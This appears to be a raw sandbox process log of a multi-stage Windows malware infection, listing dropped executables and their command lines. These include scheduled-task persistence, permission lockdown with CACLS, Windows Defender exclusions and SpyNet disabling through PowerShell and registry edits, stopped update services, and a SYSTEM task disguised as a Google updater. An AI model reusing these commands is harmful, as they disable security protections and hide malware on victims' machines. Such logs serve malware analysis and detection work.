"C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1092 -ip 1092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 204
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\26CD.tmp\26CE.tmp\26CF.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13066858964225448386,12215929807450836498,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13066858964225448386,12215929807450836498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,14973337550866805478,9103256636975688907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14973337550866805478,9103256636975688907,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\5464.exe
C:\Users\Admin\AppData\Local\Temp\5464.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe
C:\Users\Admin\AppData\Local\Temp\58CA.exe
C:\Users\Admin\AppData\Local\Temp\58CA.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7B48.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7CCF.exe
C:\Users\Admin\AppData\Local\Temp\7CCF.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\8A3E.exe
C:\Users\Admin\AppData\Local\Temp\8A3E.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 5376 -ip 5376
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe
C:\Users\Admin\AppData\Local\Temp\924D.exe
C:\Users\Admin\AppData\Local\Temp\924D.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 540
C:\Users\Admin\AppData\Local\Temp\9675.exe
C:\Users\Admin\AppData\Local\Temp\9675.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7184 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\EF25.exe
C:\Users\Admin\AppData\Local\Temp\EF25.exe
C:\Users\Admin\AppData\Local\Temp\F0BC.exe
C:\Users\Admin\AppData\Local\Temp\F0BC.exe
C:\Users\Admin\AppData\Local\Temp\F282.exe
C:\Users\Admin\AppData\Local\Temp\F282.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\FAEF.exe
C:\Users\Admin\AppData\Local\Temp\FAEF.exe
C:\Users\Admin\AppData\Local\Temp\7zSFBEF.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp" /SL5="$60256,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5744 -ip 5744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 572
C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe
.\Install.exe /MKdidA "385119" /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\3FD9.exe
C:\Users\Admin\AppData\Local\Temp\3FD9.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
